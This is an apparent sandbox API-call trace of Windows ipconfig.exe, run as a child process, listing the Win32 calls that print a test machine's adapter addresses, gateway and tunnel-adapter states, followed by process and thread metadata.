	[0216.795] GetModuleHandleW (lpModuleName=0x0) returned 0xffad0000
	[0216.795] __set_app_type (_Type=0x1) 
	[0216.795] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xffad9718) returned 0x0
	[0216.796] __getmainargs (in: _Argc=0xffade820, _Argv=0xffade830, _Env=0xffade828, _DoWildCard=0, _StartInfo=0xffade83c | out: _Argc=0xffade820, _Argv=0xffade830, _Env=0xffade828) returned 0
	[0216.796] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1
	[0216.796] setlocale (category=0, locale="") returned="English_United States.1252"
	[0216.798] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409
	[0216.799] GetCommandLineW () returned="\"C:\\Windows\\system32\\ipconfig.exe\""
	[0216.799] CommandLineToArgvW (in: lpCmdLine="\"C:\\Windows\\system32\\ipconfig.exe\"", pNumArgs=0x12fc68 | out: pNumArgs=0x12fc68) returned 0x1b0250*="C:\\Windows\\system32\\ipconfig.exe"
	[0216.799] GetStdHandle (nStdHandle=0xfffffff5) returned 0x4e0
	[0216.799] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2710, dwLanguageId=0x0, lpBuffer=0x12fb30, nSize=0x0, Arguments=0x12fb38 | out: lpBuffer="ϰ\x1b") returned 0x1e
	[0216.799] GetStdHandle (nStdHandle=0xfffffff5) returned 0x4e0
	[0216.799] GetFileType (hFile=0x4e0) returned 0x3
	[0216.799] GetProcessHeap () returned 0x190000
	[0216.799] RtlAllocateHeap (HeapHandle=0x190000, Flags=0x0, Size=0x3c) returned 0x1a62c0
	[0216.799] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\nWindows IP Configuration\r\n\r\n", cchWideChar=30, lpMultiByteStr=0x1a62c0, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nWindows IP Configuration\r\n\r\n", lpUsedDefaultChar=0x0) returned 30
	[0216.799] WriteFile (in: hFile=0x4e0, lpBuffer=0x1a62c0*, nNumberOfBytesToWrite=0x1e, lpNumberOfBytesWritten=0x12fb00, lpOverlapped=0x0 | out: lpBuffer=0x1a62c0*, lpNumberOfBytesWritten=0x12fb00*=0x1e, lpOverlapped=0x0) returned 1
	[0216.804] GetProcessHeap () returned 0x190000
	[0216.804] HeapFree (in: hHeap=0x190000, dwFlags=0x0, lpMem=0x1a62c0 | out: hHeap=0x190000) returned 1
	[0216.804] LocalFree (hMem=0x1b03f0) returned 0x0
	[0216.804] GetAdaptersAddresses (in: Family=0x0, Flags=0xc6, Reserved=0x0, AdapterAddresses=0x0, SizePointer=0x12fb50*=0x0 | out: AdapterAddresses=0x0, SizePointer=0x12fb50*=0xd40) returned 0x6f
	[0217.500] LocalAlloc (uFlags=0x40, uBytes=0xd40) returned 0x1b03f0
	[0217.500] GetAdaptersAddresses (in: Family=0x0, Flags=0xc6, Reserved=0x0, AdapterAddresses=0x1b03f0, SizePointer=0x12fb50*=0xd40 | out: AdapterAddresses=0x1b03f0*(Alignment=0xe000001c0, Length=0x1c0, IfIndex=0xe, Next=0x1b0780, AdapterName="{208C2C2F-ECA0-4B34-8C2D-83B1FBC25E0D}", FirstUnicastAddress=0x1b0670, FirstAnycastAddress=0x0, FirstMulticastAddress=0x0, FirstDnsServerAddress=0x1b0720, DnsSuffix="", Description="Intel(R) PRO/1000 MT Network Connection #2", FriendlyName="Local Area Connection 2", PhysicalAddress=([0]=0x0, [1]=0x1c, [2]=0x34, [3]=0xa2, [4]=0x42, [5]=0x2b, [6]=0x0, [7]=0x0), PhysicalAddressLength=0x6, Flags=0x3e5, DdnsEnabled=0x3e5, RegisterAdapterSuffix=0x3e5, Dhcpv4Enabled=0x3e5, ReceiveOnly=0x3e5, NoMulticast=0x3e5, Ipv6OtherStatefulConfig=0x3e5, NetbiosOverTcpipEnabled=0x3e5, Ipv4Enabled=0x3e5, Ipv6Enabled=0x3e5, Ipv6ManagedAddressConfigurationSupported=0x3e5, Mtu=0x5dc, IfType=0x6, OperStatus=0x1, Ipv6IfIndex=0xe, ZoneIndices=([0]=0xe, [1]=0xe, [2]=0xe, [3]=0xe, [4]=0x1, [5]=0x1, [6]=0x1, [7]=0x1, [8]=0x1, [9]=0x1, [10]=0x1, [11]=0x1, [12]=0x1, [13]=0x1, [14]=0x0, [15]=0x1), FirstPrefix=0x0, TransmitLinkSpeed=0x3b9aca00, ReceiveLinkSpeed=0x3b9aca00, FirstWinsServerAddress=0x0, FirstGatewayAddress=0x1b0750, Ipv4Metric=0xa, Ipv6Metric=0xa, Luid=0x6000007000000, Dhcpv4Server.lpSockaddr=0x1b05b0*(sa_family=2, sin_port=0x0, sin_addr="192.168.0.1"), Dhcpv4Server.iSockaddrLength=16, CompartmentId=0x1, NetworkGuid=0x11de7039846ee341, ConnectionType=0x1, TunnelType=0x0, Dhcpv6Server.lpSockaddr=0x0, Dhcpv6Server.iSockaddrLength=0, Dhcpv6ClientDuid=([0]=0x0, [1]=0x1, [2]=0x0, [3]=0x1, [4]=0x20, [5]=0xc7, [6]=0x5c, [7]=0xa7, [8]=0xc4, [9]=0x3d, [10]=0xc7, [11]=0x58, [12]=0x4a, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0), Dhcpv6ClientDuidLength=0xe, Dhcpv6Iaid=0x11c43dc7, FirstDnsSuffix=0x0), SizePointer=0x12fb50*=0xd40) returned 0x0
	[0217.521] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2758, dwLanguageId=0x0, lpBuffer=0x12f6e0, nSize=0x0, Arguments=0x12f6e8 | out: lpBuffer="镐\x1b") returned 0x2f
	[0217.521] GetStdHandle (nStdHandle=0xfffffff5) returned 0x4e0
	[0217.521] GetFileType (hFile=0x4e0) returned 0x3
	[0217.521] GetProcessHeap () returned 0x190000
	[0217.521] RtlAllocateHeap (HeapHandle=0x190000, Flags=0x0, Size=0x5e) returned 0x1be5b0
	[0217.521] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\nEthernet adapter Local Area Connection 2:\r\n\r\n", cchWideChar=47, lpMultiByteStr=0x1be5b0, cbMultiByte=94, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nEthernet adapter Local Area Connection 2:\r\n\r\nÿÿÿÿÿ½\x09\x05", lpUsedDefaultChar=0x0) returned 47
	[0217.521] WriteFile (in: hFile=0x4e0, lpBuffer=0x1be5b0*, nNumberOfBytesToWrite=0x2f, lpNumberOfBytesWritten=0x12f6b0, lpOverlapped=0x0 | out: lpBuffer=0x1be5b0*, lpNumberOfBytesWritten=0x12f6b0*=0x2f, lpOverlapped=0x0) returned 1
	[0217.523] GetProcessHeap () returned 0x190000
	[0217.523] HeapFree (in: hHeap=0x190000, dwFlags=0x0, lpMem=0x1be5b0 | out: hHeap=0x190000) returned 1
	[0217.523] LocalFree (hMem=0x1b9550) returned 0x0
	[0217.523] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x277e, dwLanguageId=0x0, lpBuffer=0x12f6e0, nSize=0x0, Arguments=0x12f6e8 | out: lpBuffer="쵐\x1b") returned 0x29
	[0217.524] GetStdHandle (nStdHandle=0xfffffff5) returned 0x4e0
	[0217.524] GetFileType (hFile=0x4e0) returned 0x3
	[0217.524] GetProcessHeap () returned 0x190000
	[0217.524] RtlAllocateHeap (HeapHandle=0x190000, Flags=0x0, Size=0x52) returned 0x1b9470
	[0217.524] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="   Connection-specific DNS Suffix  . : \r\n", cchWideChar=41, lpMultiByteStr=0x1b9470, cbMultiByte=82, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="   Connection-specific DNS Suffix  . : \r\n", lpUsedDefaultChar=0x0) returned 41
	[0217.524] WriteFile (in: hFile=0x4e0, lpBuffer=0x1b9470*, nNumberOfBytesToWrite=0x29, lpNumberOfBytesWritten=0x12f6b0, lpOverlapped=0x0 | out: lpBuffer=0x1b9470*, lpNumberOfBytesWritten=0x12f6b0*=0x29, lpOverlapped=0x0) returned 1
	[0217.524] GetProcessHeap () returned 0x190000
	[0217.524] HeapFree (in: hHeap=0x190000, dwFlags=0x0, lpMem=0x1b9470 | out: hHeap=0x190000) returned 1
	[0217.524] LocalFree (hMem=0x1bcd50) returned 0x0
	[0217.524] RtlIpv6AddressToStringExW () returned 0x0
	[0217.525] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x296a, dwLanguageId=0x0, lpBuffer=0x12f6e0, nSize=0x0, Arguments=0x12f6e8 | out: lpBuffer="쵐\x1b") returned 0x45
	[0217.525] GetStdHandle (nStdHandle=0xfffffff5) returned 0x4e0
	[0217.525] GetFileType (hFile=0x4e0) returned 0x3
	[0217.525] GetProcessHeap () returned 0x190000
	[0217.525] RtlAllocateHeap (HeapHandle=0x190000, Flags=0x0, Size=0x8a) returned 0x1b9470
	[0217.525] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="   Link-local IPv6 Address . . . . . : fe80::e90b:3eb3:3aaa:6919%14\r\n", cchWideChar=69, lpMultiByteStr=0x1b9470, cbMultiByte=138, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="   Link-local IPv6 Address . . . . . : fe80::e90b:3eb3:3aaa:6919%14\r\n", lpUsedDefaultChar=0x0) returned 69
	[0217.525] WriteFile (in: hFile=0x4e0, lpBuffer=0x1b9470*, nNumberOfBytesToWrite=0x45, lpNumberOfBytesWritten=0x12f6b0, lpOverlapped=0x0 | out: lpBuffer=0x1b9470*, lpNumberOfBytesWritten=0x12f6b0*=0x45, lpOverlapped=0x0) returned 1
	[0217.526] GetProcessHeap () returned 0x190000
	[0217.526] HeapFree (in: hHeap=0x190000, dwFlags=0x0, lpMem=0x1b9470 | out: hHeap=0x190000) returned 1
	[0217.526] LocalFree (hMem=0x1bcd50) returned 0x0
	[0217.526] RtlIpv4AddressToStringExW () returned 0x0
	[0217.526] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x278a, dwLanguageId=0x0, lpBuffer=0x12f6e0, nSize=0x0, Arguments=0x12f6e8 | out: lpBuffer="쵐\x1b") returned 0x36
	[0217.526] GetStdHandle (nStdHandle=0xfffffff5) returned 0x4e0
	[0217.526] GetFileType (hFile=0x4e0) returned 0x3
	[0217.526] GetProcessHeap () returned 0x190000
	[0217.526] RtlAllocateHeap (HeapHandle=0x190000, Flags=0x0, Size=0x6c) returned 0x1b9470
	[0217.526] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="   IPv4 Address. . . . . . . . . . . : 192.168.0.232\r\n", cchWideChar=54, lpMultiByteStr=0x1b9470, cbMultiByte=108, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="   IPv4 Address. . . . . . . . . . . : 192.168.0.232\r\n:3aaa:6919%14\r\n", lpUsedDefaultChar=0x0) returned 54
	[0217.526] WriteFile (in: hFile=0x4e0, lpBuffer=0x1b9470*, nNumberOfBytesToWrite=0x36, lpNumberOfBytesWritten=0x12f6b0, lpOverlapped=0x0 | out: lpBuffer=0x1b9470*, lpNumberOfBytesWritten=0x12f6b0*=0x36, lpOverlapped=0x0) returned 1
	[0217.527] GetProcessHeap () returned 0x190000
	[0217.527] HeapFree (in: hHeap=0x190000, dwFlags=0x0, lpMem=0x1b9470 | out: hHeap=0x190000) returned 1
	[0217.527] LocalFree (hMem=0x1bcd50) returned 0x0
	[0217.527] ConvertLengthToIpv4Mask (in: MaskLength=0x18, Mask=0x12f770 | out: Mask=0x12f770) returned 0x0
	[0217.527] inet_ntoa (in=0xffffff) returned="255.255.255.0"
	[0218.014] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1b9728, cbMultiByte=-1, lpWideCharStr=0x12f7b0, cchWideChar=100 | out: lpWideCharStr="255.255.255.0") returned 14
	[0218.014] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x278c, dwLanguageId=0x0, lpBuffer=0x12f6e0, nSize=0x0, Arguments=0x12f6e8 | out: lpBuffer="컐\x1b") returned 0x36
	[0218.014] GetStdHandle (nStdHandle=0xfffffff5) returned 0x4e0
	[0218.014] GetFileType (hFile=0x4e0) returned 0x3
	[0218.014] GetProcessHeap () returned 0x190000
	[0218.014] RtlAllocateHeap (HeapHandle=0x190000, Flags=0x0, Size=0x6c) returned 0x1b9470
	[0218.014] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="   Subnet Mask . . . . . . . . . . . : 255.255.255.0\r\n", cchWideChar=54, lpMultiByteStr=0x1b9470, cbMultiByte=108, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="   Subnet Mask . . . . . . . . . . . : 255.255.255.0\r\n", lpUsedDefaultChar=0x0) returned 54
	[0218.014] WriteFile (in: hFile=0x4e0, lpBuffer=0x1b9470*, nNumberOfBytesToWrite=0x36, lpNumberOfBytesWritten=0x12f6b0, lpOverlapped=0x0 | out: lpBuffer=0x1b9470*, lpNumberOfBytesWritten=0x12f6b0*=0x36, lpOverlapped=0x0) returned 1
	[0218.019] GetProcessHeap () returned 0x190000
	[0218.019] HeapFree (in: hHeap=0x190000, dwFlags=0x0, lpMem=0x1b9470 | out: hHeap=0x190000) returned 1
	[0218.019] LocalFree (hMem=0x1bced0) returned 0x0
	[0218.019] RtlIpv4AddressToStringExW () returned 0x0
	[0218.019] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x278d, dwLanguageId=0x0, lpBuffer=0x12f6e0, nSize=0x0, Arguments=0x12f6e8 | out: lpBuffer="컐\x1b") returned 0x34
	[0218.019] GetStdHandle (nStdHandle=0xfffffff5) returned 0x4e0
	[0218.019] GetFileType (hFile=0x4e0) returned 0x3
	[0218.019] GetProcessHeap () returned 0x190000
	[0218.019] RtlAllocateHeap (HeapHandle=0x190000, Flags=0x0, Size=0x68) returned 0x1be5b0
	[0218.019] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="   Default Gateway . . . . . . . . . : 192.168.0.1\r\n", cchWideChar=52, lpMultiByteStr=0x1be5b0, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="   Default Gateway . . . . . . . . . : 192.168.0.1\r\n½\x09\x05", lpUsedDefaultChar=0x0) returned 52
	[0218.019] WriteFile (in: hFile=0x4e0, lpBuffer=0x1be5b0*, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0x12f6b0, lpOverlapped=0x0 | out: lpBuffer=0x1be5b0*, lpNumberOfBytesWritten=0x12f6b0*=0x34, lpOverlapped=0x0) returned 1
	[0218.024] GetProcessHeap () returned 0x190000
	[0218.024] HeapFree (in: hHeap=0x190000, dwFlags=0x0, lpMem=0x1be5b0 | out: hHeap=0x190000) returned 1
	[0218.024] LocalFree (hMem=0x1bced0) returned 0x0
	[0218.024] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x275e, dwLanguageId=0x0, lpBuffer=0x12f6e0, nSize=0x0, Arguments=0x12f6e8 | out: lpBuffer="镐\x1b") returned 0x43
	[0218.024] GetStdHandle (nStdHandle=0xfffffff5) returned 0x4e0
	[0218.024] GetFileType (hFile=0x4e0) returned 0x3
	[0218.024] GetProcessHeap () returned 0x190000
	[0218.024] RtlAllocateHeap (HeapHandle=0x190000, Flags=0x0, Size=0x86) returned 0x1b9470
	[0218.024] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\nTunnel adapter isatap.{208C2C2F-ECA0-4B34-8C2D-83B1FBC25E0D}:\r\n\r\n", cchWideChar=67, lpMultiByteStr=0x1b9470, cbMultiByte=134, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nTunnel adapter isatap.{208C2C2F-ECA0-4B34-8C2D-83B1FBC25E0D}:\r\n\r\n", lpUsedDefaultChar=0x0) returned 67
	[0218.024] WriteFile (in: hFile=0x4e0, lpBuffer=0x1b9470*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x12f6b0, lpOverlapped=0x0 | out: lpBuffer=0x1b9470*, lpNumberOfBytesWritten=0x12f6b0*=0x43, lpOverlapped=0x0) returned 1
	[0218.030] GetProcessHeap () returned 0x190000
	[0218.030] HeapFree (in: hHeap=0x190000, dwFlags=0x0, lpMem=0x1b9470 | out: hHeap=0x190000) returned 1
	[0218.030] LocalFree (hMem=0x1b9550) returned 0x0
	[0218.030] ConvertInterfaceIndexToLuid (in: InterfaceIndex=0xc, InterfaceLuid=0x12f768 | out: InterfaceLuid=0x12f768) returned 0x0
	[0218.030] NsiGetAllParameters () returned 0x0
	[0218.030] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2774, dwLanguageId=0x0, lpBuffer=0x12f6e0, nSize=0x0, Arguments=0x12f6e8 | out: lpBuffer="컐\x1b") returned 0x3b
	[0218.030] GetStdHandle (nStdHandle=0xfffffff5) returned 0x4e0
	[0218.030] GetFileType (hFile=0x4e0) returned 0x3
	[0218.030] GetProcessHeap () returned 0x190000
	[0218.030] RtlAllocateHeap (HeapHandle=0x190000, Flags=0x0, Size=0x76) returned 0x1b9470
	[0218.030] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="   Media State . . . . . . . . . . . : Media disconnected\r\n", cchWideChar=59, lpMultiByteStr=0x1b9470, cbMultiByte=118, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="   Media State . . . . . . . . . . . : Media disconnected\r\n0D}:\r\n\r\n", lpUsedDefaultChar=0x0) returned 59
	[0218.030] WriteFile (in: hFile=0x4e0, lpBuffer=0x1b9470*, nNumberOfBytesToWrite=0x3b, lpNumberOfBytesWritten=0x12f6b0, lpOverlapped=0x0 | out: lpBuffer=0x1b9470*, lpNumberOfBytesWritten=0x12f6b0*=0x3b, lpOverlapped=0x0) returned 1
	[0218.032] GetProcessHeap () returned 0x190000
	[0218.032] HeapFree (in: hHeap=0x190000, dwFlags=0x0, lpMem=0x1b9470 | out: hHeap=0x190000) returned 1
	[0218.032] LocalFree (hMem=0x1bced0) returned 0x0
	[0218.032] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x277e, dwLanguageId=0x0, lpBuffer=0x12f6e0, nSize=0x0, Arguments=0x12f6e8 | out: lpBuffer="컐\x1b") returned 0x29
	[0218.032] GetStdHandle (nStdHandle=0xfffffff5) returned 0x4e0
	[0218.032] GetFileType (hFile=0x4e0) returned 0x3
	[0218.032] GetProcessHeap () returned 0x190000
	[0218.032] RtlAllocateHeap (HeapHandle=0x190000, Flags=0x0, Size=0x52) returned 0x1b9690
	[0218.032] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="   Connection-specific DNS Suffix  . : \r\n", cchWideChar=41, lpMultiByteStr=0x1b9690, cbMultiByte=82, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="   Connection-specific DNS Suffix  . : \r\n", lpUsedDefaultChar=0x0) returned 41
	[0218.032] WriteFile (in: hFile=0x4e0, lpBuffer=0x1b9690*, nNumberOfBytesToWrite=0x29, lpNumberOfBytesWritten=0x12f6b0, lpOverlapped=0x0 | out: lpBuffer=0x1b9690*, lpNumberOfBytesWritten=0x12f6b0*=0x29, lpOverlapped=0x0) returned 1
	[0218.033] GetProcessHeap () returned 0x190000
	[0218.033] HeapFree (in: hHeap=0x190000, dwFlags=0x0, lpMem=0x1b9690 | out: hHeap=0x190000) returned 1
	[0218.033] LocalFree (hMem=0x1bced0) returned 0x0
	[0218.033] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x275e, dwLanguageId=0x0, lpBuffer=0x12f6e0, nSize=0x0, Arguments=0x12f6e8 | out: lpBuffer="镐\x1b") returned 0x37
	[0218.033] GetStdHandle (nStdHandle=0xfffffff5) returned 0x4e0
	[0218.033] GetFileType (hFile=0x4e0) returned 0x3
	[0218.033] GetProcessHeap () returned 0x190000
	[0218.033] RtlAllocateHeap (HeapHandle=0x190000, Flags=0x0, Size=0x6e) returned 0x1c1330
	[0218.034] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\nTunnel adapter Teredo Tunneling Pseudo-Interface:\r\n\r\n", cchWideChar=55, lpMultiByteStr=0x1c1330, cbMultiByte=110, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nTunnel adapter Teredo Tunneling Pseudo-Interface:\r\n\r\n", lpUsedDefaultChar=0x0) returned 55
	[0218.034] WriteFile (in: hFile=0x4e0, lpBuffer=0x1c1330*, nNumberOfBytesToWrite=0x37, lpNumberOfBytesWritten=0x12f6b0, lpOverlapped=0x0 | out: lpBuffer=0x1c1330*, lpNumberOfBytesWritten=0x12f6b0*=0x37, lpOverlapped=0x0) returned 1
	[0218.037] GetProcessHeap () returned 0x190000
	[0218.037] HeapFree (in: hHeap=0x190000, dwFlags=0x0, lpMem=0x1c1330 | out: hHeap=0x190000) returned 1
	[0218.037] LocalFree (hMem=0x1b9550) returned 0x0
	[0218.037] ConvertInterfaceIndexToLuid (in: InterfaceIndex=0xd, InterfaceLuid=0x12f768 | out: InterfaceLuid=0x12f768) returned 0x0
	[0218.037] NsiGetAllParameters () returned 0x0
	[0218.037] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2774, dwLanguageId=0x0, lpBuffer=0x12f6e0, nSize=0x0, Arguments=0x12f6e8 | out: lpBuffer="컐\x1b") returned 0x3b
	[0218.037] GetStdHandle (nStdHandle=0xfffffff5) returned 0x4e0
	[0218.037] GetFileType (hFile=0x4e0) returned 0x3
	[0218.037] GetProcessHeap () returned 0x190000
	[0218.037] RtlAllocateHeap (HeapHandle=0x190000, Flags=0x0, Size=0x76) returned 0x1c1330
	[0218.037] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="   Media State . . . . . . . . . . . : Media disconnected\r\n", cchWideChar=59, lpMultiByteStr=0x1c1330, cbMultiByte=118, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="   Media State . . . . . . . . . . . : Media disconnected\r\n", lpUsedDefaultChar=0x0) returned 59
	[0218.037] WriteFile (in: hFile=0x4e0, lpBuffer=0x1c1330*, nNumberOfBytesToWrite=0x3b, lpNumberOfBytesWritten=0x12f6b0, lpOverlapped=0x0 | out: lpBuffer=0x1c1330*, lpNumberOfBytesWritten=0x12f6b0*=0x3b, lpOverlapped=0x0) returned 1
	[0218.038] GetProcessHeap () returned 0x190000
	[0218.038] HeapFree (in: hHeap=0x190000, dwFlags=0x0, lpMem=0x1c1330 | out: hHeap=0x190000) returned 1
	[0218.038] LocalFree (hMem=0x1bced0) returned 0x0
	[0218.038] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x277e, dwLanguageId=0x0, lpBuffer=0x12f6e0, nSize=0x0, Arguments=0x12f6e8 | out: lpBuffer="컐\x1b") returned 0x29
	[0218.038] GetStdHandle (nStdHandle=0xfffffff5) returned 0x4e0
	[0218.039] GetFileType (hFile=0x4e0) returned 0x3
	[0218.039] GetProcessHeap () returned 0x190000
	[0218.039] RtlAllocateHeap (HeapHandle=0x190000, Flags=0x0, Size=0x52) returned 0x1b9690
	[0218.039] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="   Connection-specific DNS Suffix  . : \r\n", cchWideChar=41, lpMultiByteStr=0x1b9690, cbMultiByte=82, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="   Connection-specific DNS Suffix  . : \r\n", lpUsedDefaultChar=0x0) returned 41
	[0218.039] WriteFile (in: hFile=0x4e0, lpBuffer=0x1b9690*, nNumberOfBytesToWrite=0x29, lpNumberOfBytesWritten=0x12f6b0, lpOverlapped=0x0 | out: lpBuffer=0x1b9690*, lpNumberOfBytesWritten=0x12f6b0*=0x29, lpOverlapped=0x0) returned 1
	[0218.040] GetProcessHeap () returned 0x190000
	[0218.040] HeapFree (in: hHeap=0x190000, dwFlags=0x0, lpMem=0x1b9690 | out: hHeap=0x190000) returned 1
	[0218.040] LocalFree (hMem=0x1bced0) returned 0x0
	[0218.040] LocalFree (hMem=0x1b03f0) returned 0x0
	[0218.040] CoUninitialize () 
	[0218.040] exit (_Code=0) 

Thread:
	id = 300
	os_tid = 0xc94


Process:
	id = "22"
	image_name = "ipconfig.exe"
	filename = "c:\\windows\\system32\\ipconfig.exe"
	page_root = "0x1d050000"
	os_pid = "0xc78"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "11"
	os_parent_pid = "0x708"
	cmd_line = "\"C:\\Windows\\system32\\ipconfig.exe\""
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "32"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 294
	os_tid = 0xc7c

	[0216.983] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xaf9b0 | out: lpSystemTimeAsFileTime=0xaf9b0*(dwLowDateTime=0x6db1eda0, dwHighDateTime=0x1d5eb2b)) 
	[0216.983] GetCurrentProcessId () returned 0xc78
	[0216.983] GetCurrentThreadId () returned 0xc7c
	[0216.983] GetTickCount () returned 0x116b03d
	[0216.983] QueryPerformanceCounter (in: lpPerformanceCount=0xaf9b8 | out: lpPerformanceCount=0xaf9b8*=33749529692) returned 1
	[0216.991] GetModuleHandleW (lpModuleName=0x0) returned 0xffad0000
	[0216.991] __set_app_type (_Type=0x1) 
	[0216.991] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xffad9718) returned 0x0
	[0216.992] __getmainargs (in: _Argc=0xffade820, _Argv=0xffade830, _Env=0xffade828, _DoWildCard=0, _StartInfo=0xffade83c | out: _Argc=0xffade820, _Argv=0xffade830, _Env=0xffade828) returned 0
	[0216.992] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1
	[0216.992] setlocale (category=0, locale="") returned="English_United States.1252"
	[0217.201] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409
	[0217.201] GetCommandLineW () returned="\"C:\\Windows\\system32\\ipconfig.exe\""
	[0217.201] CommandLineToArgvW (in: lpCmdLine="\"C:\\Windows\\system32\\ipconfig.exe\"", pNumArgs=0xaf9a8 | out: pNumArgs=0xaf9a8) returned 0x170250*="C:\\Windows\\system32\\ipconfig.exe"
	[0217.201] GetStdHandle (nStdHandle=0xfffffff5) returned 0x4e8
	[0217.201] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2710, dwLanguageId=0x0, lpBuffer=0xaf870, nSize=0x0, Arguments=0xaf878 | out: lpBuffer="ϰ\x17") returned 0x1e
	[0217.202] GetStdHandle (nStdHandle=0xfffffff5) returned 0x4e8
	[0217.202] GetFileType (hFile=0x4e8) returned 0x3
	[0217.202] GetProcessHeap () returned 0x150000
